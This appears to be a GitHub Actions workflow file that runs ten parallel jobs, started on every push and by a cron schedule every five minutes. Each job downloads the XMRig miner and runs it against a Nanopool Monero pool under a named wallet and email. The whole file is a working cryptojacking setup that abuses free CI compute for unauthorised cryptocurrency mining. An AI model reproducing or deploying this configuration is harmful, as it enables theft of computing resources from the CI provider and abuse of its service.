name: Ultimate-Whale-X10
on:
  push:
    branches: [ main ]
  workflow_dispatch:
  schedule:
    - cron: "*/5 * * * *"

jobs:
  worker-1:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-1/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2
  
  worker-2:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-2/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-3:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-3/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-4:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-4/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-5:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-5/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-6:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-6/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-7:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-7/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-8:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-8/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-9:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-9/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2

  worker-10:
    runs-on: ubuntu-latest
    steps:
      - name: Start
        run: wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xf xmrig-6.21.0-linux-static-x64.tar.gz && ./xmrig-6.21.0/xmrig -o xmr-eu1.nanopool.org:14444 -u 43k1NnYRKCq9Rfd6KyHdmy18pwrhSEyEg8HiBcDCP3qj3UdxevAVoXLPGqMnk927yGf89sNb6HuQsb89pnon6Vfr4KL17BY.W-10/nfdr065@gmail.com --algo rx/0 -p x --donate-level 1 -t 2
